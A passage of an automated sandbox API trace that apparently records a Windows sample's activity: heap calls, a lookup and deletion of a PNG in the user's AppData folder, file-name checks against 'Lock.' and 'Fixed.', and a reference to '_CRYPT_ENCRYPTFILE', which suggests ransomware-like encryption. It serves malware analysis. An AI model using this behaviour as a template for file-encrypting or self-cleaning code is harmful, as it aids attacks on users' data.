(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0240.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0240.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0240.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0240.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0240.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e564e0 [0240.370] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/UR7Y.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\UR7Y.png", lpFilePart=0x8cedf4*="UR7Y.png") returned 0x28 [0240.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0240.370] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UR7Y.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ur7y.png")) returned 0x20 [0240.371] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UR7Y.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b742c0, ftCreationTime.dwHighDateTime=0x1d5f067, ftLastAccessTime.dwLowDateTime=0x2d91d700, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x2d91d700, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x11111, dwReserved0=0x0, dwReserved1=0x0, cFileName="UR7Y.png", cAlternateFileName="")) returned 0xa86f50 [0240.371] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UR7Y.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ur7y.png")) returned 1 [0240.373] FindNextFileW (in: hFindFile=0xa86f50, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b742c0, ftCreationTime.dwHighDateTime=0x1d5f067, ftLastAccessTime.dwLowDateTime=0x2d91d700, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x2d91d700, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x11111, dwReserved0=0x0, dwReserved1=0x0, cFileName="UR7Y.png", cAlternateFileName="")) returned 0 [0240.373] FindClose (in: hFindFile=0xa86f50 | out: hFindFile=0xa86f50) returned 1 [0240.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0240.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0240.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0240.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0240.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0240.373] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0240.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0240.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0240.373] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0240.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0240.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0240.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0240.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0240.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0240.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0240.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0240.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0240.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0240.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0240.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0240.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0240.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0240.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0240.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0240.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0240.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0240.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e564e0 [0240.374] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/UR7Y.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\UR7Y.png", lpFilePart=0x8cf650*="UR7Y.png") returned 0x28 [0240.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0240.374] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UR7Y.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ur7y.png")) returned 0xffffffff [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0240.375] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0240.375] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.375] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0240.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0240.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vJXjfUq6n4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXjfUq6n4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XjfUq6n4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jfUq6n4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fUq6n4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uq6n4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q6n4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6n4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vnAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nAr.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ar.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0240.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0240.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0240.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0240.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0240.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0240.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0240.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0240.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0240.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0240.376] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0240.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0240.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0240.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0240.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0240.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0240.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x28) returned 0x977938 [0240.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vJXjfUq6n4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXjfUq6n4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XjfUq6n4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jfUq6n4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fUq6n4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uq6n4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q6n4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6n4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vnAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nAr.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0240.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ar.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0240.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0240.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0240.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0240.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0240.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0240.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0240.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0240.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0240.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0240.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0240.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0240.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0240.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0240.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0240.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0240.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0240.437] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0240.437] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0240.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0240.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0240.437] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0240.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0240.438] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0240.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0240.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0240.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0240.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0240.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0240.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0240.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0240.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0240.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0240.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0240.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 